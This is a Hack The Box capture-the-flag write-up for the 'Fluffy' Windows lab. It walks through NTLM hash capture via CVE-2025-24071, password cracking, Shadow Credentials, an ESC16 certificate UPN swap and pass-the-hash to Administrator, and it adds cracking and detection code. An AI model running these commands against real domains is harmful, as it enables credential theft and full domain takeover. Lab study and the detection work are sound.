
Fluffy Easy Machine - Hack the Box

Easy-level Windows machine from Season 8.


Information

Fluffy is an Easy-level Windows machine from Season 8.
As is common in real-life Windows pentests, you start this box with credentials for the following account:
j.fleischman / J0elTHEM4n1990!

Tools

  • nmap
  • smbclient
  • bloodhound
  • pywhisker
  • evil-winrm
  • impacket
  • hashcat
  • ntpdate
  • responder

In some of the following steps you may get a "Clock skew too great" error. Kerberos rejects requests when the client and KDC clocks differ by more than the allowed skew (5 minutes by default), so a drifted attacker clock breaks ticket requests, PKINIT and the certificate-based authentication used later.
To fix it, sync your clock against the DC (ntpdate needs root):

ntpdate 10.10.11.69

Step by step

  1. Start with an Nmap scan for open ports and services:

    nmap -T4 -p- -v -A -Pn -oX fluffy_tcp.scan --webxml 10.10.11.69   # -Pn: skip host discovery; -oX takes the output filename right after it

    The scan reports many open ports and, from the script output, the domain and DC host names: FLUFFY.HTB and DC01.FLUFFY.HTB. Add both to /etc/hosts, since Kerberos-based tools later on need to resolve the DC by name.

  2. SMB share listing with the given credentials:

    smbclient -L //10.10.11.69 -U j.fleischman --password=J0elTHEM4n1990!

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    IT              Disk
    NETLOGON        Disk      Logon server share
    SYSVOL          Disk      Logon server share
    

    Connecting to the IT share shows the following content:

    
    smb: \> ls
    .                                   D        0  Mon May 19 11:27:02 2025
    ..                                  D        0  Mon May 19 11:27:02 2025
    Everything-1.4.1.1026.x64           D        0  Fri Apr 18 12:08:44 2025
    Everything-1.4.1.1026.x64.zip       A  1827464  Fri Apr 18 12:04:05 2025
    KeePass-2.58                        D        0  Fri Apr 18 12:08:38 2025
    KeePass-2.58.zip                    A  3225346  Fri Apr 18 12:03:17 2025
    Upgrade_Notice.pdf                  A   169963  Sat May 17 11:31:07 2025
    
  3. After downloading the share content, the only interesting file is Upgrade_Notice.pdf: it lists a number of CVEs that are patched or about to be patched on the target.
    Investigating them, one has a public PoC: CVE-2025-24071, an NTLM hash-disclosure bug in Windows Explorer where Explorer processes a crafted file and authenticates to an attacker-controlled SMB server, leaking the user's NetNTLMv2 response.
    The only place we can write to at the moment is the IT share, so we upload the PoC there and run an SMB capture listener (the output below is Responder's) while waiting for someone to browse the folder.
    After a few seconds the listener receives several NTLMv2 authentications; one of them is for p.agila, so we have a new user:

    [+] Received SMB connection on Auth Capture Server!
    [SMB] NTLMv2-SSP Client     : 10.10.11.69
    [SMB] NTLMv2-SSP Username   : FLUFFY\p.agila
    [SMB] NTLMv2-SSP Hash       : p.agila::FLUFFY:691bad4c448506e3:e66386e1f140e4643879060a39bf8bde:...

    The hash cracks with hashcat (mode 5600, NetNTLMv2): p.agila:prometheusx-303.
    Neither of the two accounts we now have has remote-access rights, so we need to keep exploring our options.

  4. BloodHound collection:

    bloodhound-python -d FLUFFY.HTB -u j.fleischman -p "J0elTHEM4n1990!" -gc dc01.fluffy.htb -c all -ns 10.10.11.69

    Looking at the relationships of j.fleischman and p.agila, only p.agila has interesting ones.
    p.agila is a member of SERVICE ACCOUNT MANAGERS, which has GenericAll over the SERVICE ACCOUNTS group, and SERVICE ACCOUNTS has GenericWrite over the ca_svc, ldap_svc and winrm_svc accounts.
    GenericAll on a group lets us change its membership, so we can add p.agila to SERVICE ACCOUNTS. GenericWrite on a user covers the msDS-KeyCredentialLink attribute, which is exactly what a Shadow Credentials attack writes to, so from there we can take over any of the three service accounts.

  5. First, add p.agila to SERVICE ACCOUNTS:

    net rpc group addmem "SERVICE ACCOUNTS" "p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"

    Then we use pywhisker, gettgtpkinit and getnthash to add a key credential (a certificate) to the target, obtain a TGT with it via PKINIT, and recover the account's NT hash respectively. I attacked winrm_svc first because it has remote-access rights, so I could go straight to evil-winrm.

    pywhisker.py -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "winrm_svc" --action "add"

    gettgtpkinit -cert-pem oBwGyENT_cert.pem -key-pem oBwGyENT_priv.pem fluffy.htb/winrm_svc winrm_svc.ccache

    export KRB5CCNAME=winrm_svc.ccache

    The -key value below is the AS-REP encryption key that gettgtpkinit prints; getnthash needs it to decrypt the PAC and extract the NT hash:

    getnthash -key 3ccd6794d17d1ac416725120643c2d0867858e44556de69ad8854da2d0b0f627 fluffy.htb/winrm_svc
    
  6. With the NT hash we can pass the hash over WinRM:

    evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
    

:trophy: USER FLAG PWNED :trophy:
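The cracking in step 3 is where hashcat mode 5600 does its work. The following is an added example, not code from the original post or from Responder/hashcat: it implements the NetNTLMv2 computation in plain Python so you can see what is actually being checked (NT hash = MD4 of the UTF-16LE password, NTLMv2 key = HMAC-MD5 over the uppercased user plus domain, NTProofStr = HMAC-MD5 over server challenge plus blob) and verify a candidate password against a captured line offline. The sample line is constructed: the post's capture is truncated, so it is rebuilt with the same user, domain and server challenge, a made-up client challenge and an empty target-info list.

```python
"""NetNTLMv2 (Responder / hashcat -m 5600) parse-and-verify. Added example,
not code from the original post. MD4 is implemented inline because OpenSSL 3
builds of Python often ship without hashlib's 'md4'."""
import hashlib
import hmac
import struct
from typing import Optional


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, needed for the NT hash."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]  # working registers a, b, c, d
        for func, const, shifts, order in rounds:
            for i, k in enumerate(order):
                t = (-i) % 4  # register updated this step cycles a, d, c, b
                mixed = v[t] + func(v[(t + 1) % 4], v[(t + 2) % 4], v[(t + 3) % 4]) + x[k] + const
                v[t] = rotl(mixed & mask, shifts[i % 4])
        state = [(s + w) & mask for s, w in zip(state, v)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); the value evil-winrm -H takes."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTLMv2 hash = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))."""
    ident = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash(password), ident, hashlib.md5).digest()


def parse_5600(line: str):
    """Split user::domain:server_challenge:NTProofStr:blob as Responder prints it."""
    user, sep, rest = line.strip().partition("::")
    if not sep:
        raise ValueError("not a NetNTLMv2 line")
    domain, challenge, proof, blob = rest.split(":", 3)
    if len(challenge) != 16 or len(proof) != 32:
        raise ValueError("server challenge must be 8 bytes and NTProofStr 16 bytes")
    return user, domain, bytes.fromhex(challenge), bytes.fromhex(proof), bytes.fromhex(blob)


def check_password(line: str, password: str) -> bool:
    """True if NTProofStr == HMAC-MD5(NTLMv2 key, server_challenge || blob)."""
    user, domain, challenge, proof, blob = parse_5600(line)
    calc = hmac.new(ntlmv2_key(password, user, domain), challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(calc, proof)


def crack(line: str, wordlist) -> Optional[str]:
    """Dictionary attack; hashcat -m 5600 does exactly this, only far faster."""
    for candidate in wordlist:
        if check_password(line, candidate):
            return candidate
    return None


def build_5600(user: str, domain: str, password: str, challenge: bytes, blob: bytes) -> str:
    """Forge a capture line for a known password (used for the constructed sample)."""
    proof = hmac.new(ntlmv2_key(password, user, domain), challenge + blob, hashlib.md5).digest()
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample: same user, domain and server challenge as the post's capture,
# made-up client challenge, empty target-info list (MsvAvEOL only).
SAMPLE_BLOB = (
    bytes.fromhex("0101000000000000")   # NTLMv2 response type and reserved
    + bytes(8)                           # timestamp (zeroed in this sample)
    + bytes.fromhex("1122334455667788")  # client challenge (constructed)
    + bytes(4)                           # reserved
    + bytes(4)                           # AV_PAIR MsvAvEOL terminator
    + bytes(4)                           # trailing reserved
)
SAMPLE_LINE = build_5600("p.agila", "FLUFFY", "prometheusx-303",
                         bytes.fromhex("691bad4c448506e3"), SAMPLE_BLOB)
```

Feeding SAMPLE_LINE to hashcat -m 5600 with a wordlist containing prometheusx-303 gives the same result as crack(); the NT-hash test vector for "password" (8846f7eaee8fb117ad06bdd830b7586c) is a quick way to confirm the MD4 implementation before trusting a negative result.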

Now, for the root flag I looked around the system and re-checked the CVEs from the PDF, but after some time I had not found anything useful. I then checked for certificate (AD CS) vulnerabilities, since we can control the ca_svc account, but again certipy found nothing.
In these labs the service accounts are usually there for a reason, and since the CVEs in the PDF are recent, I checked the certipy GitHub repository and found recent changes. Comparing the GitHub version with the Kali package, Kali had not updated it yet.
After installing certipy directly from the GitHub repository and running the vulnerability check again, this time it found one.
This newer finding is documented in the certipy wiki as ESC16: Security Extension Disabled on CA (Globally). ESC16 means the CA has the szOID_NTDS_CA_SECURITY_EXT extension (OID 1.3.6.1.4.1.311.25.2) in its DisableExtensionList, so every certificate it issues lacks the requester's SID; the DC then has to map the certificate to an account by the UPN in its SAN, and anyone who can change a victim's UPN can obtain a certificate that maps to a different account.
Following the steps documented in the wiki we get the Administrator hash.

  1. This step can be skipped if you already did step 5 of the user part against ca_svc and have ca_svc.ccache and its NT hash. Otherwise, certipy shadow auto does the whole Shadow Credentials attack in one go (adds a key credential, gets a TGT via PKINIT, recovers the NT hash and restores the original msDS-KeyCredentialLink):

    certipy shadow -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -account 'ca_svc' auto

    [*] Saving credential cache to 'ca_svc.ccache'
    File 'ca_svc.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
    [*] Wrote credential cache to 'ca_svc.ccache'
    [*] Trying to retrieve NT hash for 'ca_svc'
    [*] Restoring the old Key Credentials for 'ca_svc'
    [*] Successfully restored the old Key Credentials for 'ca_svc'
    [*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
    
    export KRB5CCNAME=ca_svc.ccache

  2. Re-run the vulnerable check, this time authenticating as ca_svc. Note that certipy-ad is the name of Kali's packaged binary and certipy the name of the GitHub install; whichever you call, make sure it is the updated one, because older versions do not report ESC16 at all:

    certipy-ad find -vulnerable -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -stdout

    
    Certificate Authorities
    0
    CA Name                             : fluffy-DC01-CA
    DNS Name                            : DC01.fluffy.htb
    Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
    Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
    Certificate Validity Start          : 2025-04-17 16:00:16+00:00
    Certificate Validity End            : 3024-04-17 16:11:16+00:00
    Web Enrollment
      HTTP
       Enabled                         : False
      HTTPS
       Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
    Permissions
       Owner                             : FLUFFY.HTB\Administrators
       Access Rights
         ManageCa                        : FLUFFY.HTB\Domain Admins
                                           FLUFFY.HTB\Enterprise Admins
                                           FLUFFY.HTB\Administrators
         ManageCertificates              : FLUFFY.HTB\Domain Admins
                                           FLUFFY.HTB\Enterprise Admins
                                           FLUFFY.HTB\Administrators
         Enroll                          : FLUFFY.HTB\Cert Publishers
    [!] Vulnerabilities
       ESC16                             : Security Extension is disabled.
    [*] Remarks
       ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
    Certificate Templates                   : [!] Could not find any certificate templates
    
  3. Read the victim account's current UPN so it can be restored later:

    certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read

    
    [*] Reading attributes for 'ca_svc':
     cn                                  : certificate authority service
     distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
     name                                : certificate authority service
     objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
     sAMAccountName                      : ca_svc
     servicePrincipalName                : ADCS/ca.fluffy.htb
     userPrincipalName                   : ca_svc@fluffy.htb
     userAccountControl                  : 66048
     whenCreated                         : 2025-04-17T16:07:50+00:00
     whenChanged                         : 2025-05-25T22:30:39+00:00
    
  4. Update the victim account's UPN to the target administrator's sAMAccountName. The value is the bare name administrator rather than administrator@fluffy.htb: the real UPN is already taken by the Administrator account, and the DC still resolves a bare UPN in a certificate to the account with that sAMAccountName:

    certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update

    
    [*] Updating user 'ca_svc':
     userPrincipalName                   : administrator
    [*] Successfully updated 'ca_svc'
    
  5. Request a certificate as the "victim" user from any client-authentication template (e.g. User) on the ESC16-vulnerable CA. -k uses the Kerberos ticket in KRB5CCNAME, i.e. ca_svc.ccache from step 1. The line "Certificate has no object SID" in the output is the ESC16 condition itself: without the SID extension the DC can only map this certificate by its UPN, which now reads administrator:

    certipy req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User'

    
    [!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
    [*] Requesting certificate via RPC
    [*] Request ID is 16
    [*] Successfully requested certificate
    [*] Got certificate with UPN 'administrator'
    [*] Certificate has no object SID
    [*] Try using -sid to set the object SID or see the wiki for more details
    [*] Saving certificate and private key to 'administrator.pfx'
    File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
    [*] Wrote certificate and private key to 'administrator.pfx'
    
  6. Revert the "victim" account's UPN so ca_svc keeps working normally (and the change is less visible):

    certipy account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update

    
    [*] Updating user 'ca_svc':
     userPrincipalName                   : ca_svc@fluffy.htb
    [*] Successfully updated 'ca_svc'
    
  7. Authenticate as Administrator with the certificate (PKINIT) and let certipy recover the NT hash:

    certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'

    
    [*] Certificate identities:
    [*]     SAN UPN: 'administrator'
    [*] Using principal: 'administrator@fluffy.htb'
    [*] Trying to get TGT...
    [*] Got TGT
    [*] Saving credential cache to 'administrator.ccache'
    File 'administrator.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
    [*] Wrote credential cache to 'administrator.ccache'
    [*] Trying to retrieve NT hash for 'administrator'
    [*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
    
  8. With the Administrator NT hash we can simply pass the hash:
    
    impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e Administrator@10.10.11.69
    

:trophy: SYSTEM FLAG PWNED :trophy:
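From the defender's side, the chain in steps 4 to 6 leaves a characteristic trace: a write that sets one account's userPrincipalName to another account's name, a certificate issued to that account while the bogus UPN is in place, and the UPN being written back. The following is an added example, not code from the original post or from certipy: it walks a list of simplified, constructed event records and flags that sequence. The Event fields are my own abstraction, not the real Windows event schema; in a real pipeline they would be filled from Directory Service Changes events (5136, attribute userPrincipalName) and CA issuance events (4887). The sample events mirror the steps above and include a harmless self-rename to show it is ignored.

```python
"""Detecting the ESC16 UPN swap from directory-change events. Added example,
not code from the original post or from certipy; event records are a
simplified, constructed abstraction of 5136/4887 data."""
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class Event:
    ts: int        # ordering key (epoch seconds in a real pipeline)
    kind: str      # "upn_change" (directory write) or "cert_issued" (CA issuance)
    account: str   # sAMAccountName whose UPN changed / that enrolled
    value: str     # new UPN, or the UPN carried in the issued certificate


def upn_user_part(upn: str) -> str:
    """Compare by user part, case-insensitively: 'administrator' matches 'Administrator@fluffy.htb'."""
    return upn.split("@", 1)[0].lower()


def detect_upn_impersonation(events: Iterable[Event], accounts: Dict[str, str]) -> List[dict]:
    """accounts maps sAMAccountName -> canonical UPN. Returns one finding per suspicious UPN write,
    noting whether a certificate was issued under the bogus UPN and whether it was reverted."""
    ordered = sorted(events, key=lambda e: e.ts)
    known = {sam.lower(): sam for sam in accounts}
    findings = []
    for i, ev in enumerate(ordered):
        if ev.kind != "upn_change":
            continue
        target = known.get(upn_user_part(ev.value))
        if target is None or target.lower() == ev.account.lower():
            continue  # UPN does not point at a *different* existing account
        finding = {"victim": ev.account, "impersonated": target, "ts": ev.ts,
                   "cert_issued": False, "reverted": False}
        for later in ordered[i + 1:]:
            if later.account.lower() != ev.account.lower():
                continue
            if later.kind == "cert_issued" and upn_user_part(later.value) == target.lower():
                finding["cert_issued"] = True
            elif later.kind == "upn_change" and upn_user_part(later.value) != target.lower():
                finding["reverted"] = True
                break  # UPN restored; anything after belongs to a new episode
        findings.append(finding)
    return findings


# Constructed sample mirroring the steps above: ca_svc's UPN is set to 'administrator',
# request ID 16 is issued with that UPN, then the UPN is put back. The p.agila event is
# a benign self-rename and must not be flagged.
ACCOUNTS = {"Administrator": "administrator@fluffy.htb",
            "ca_svc": "ca_svc@fluffy.htb",
            "p.agila": "p.agila@fluffy.htb"}
SAMPLE_EVENTS = [
    Event(100, "upn_change", "ca_svc", "administrator"),
    Event(105, "cert_issued", "ca_svc", "administrator"),
    Event(110, "upn_change", "ca_svc", "ca_svc@fluffy.htb"),
    Event(200, "upn_change", "p.agila", "P.Agila@fluffy.htb"),
]
```

A finding with cert_issued set is the high-confidence case; a UPN write pointing at another account that is never reverted is still worth an alert, since the attacker may simply not have cleaned up. The CA-side fix is to remove 1.3.6.1.4.1.311.25.2 from the CA's DisableExtensionList so issued certificates carry the SID again.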

This post is licensed under CC BY 4.0 by the author.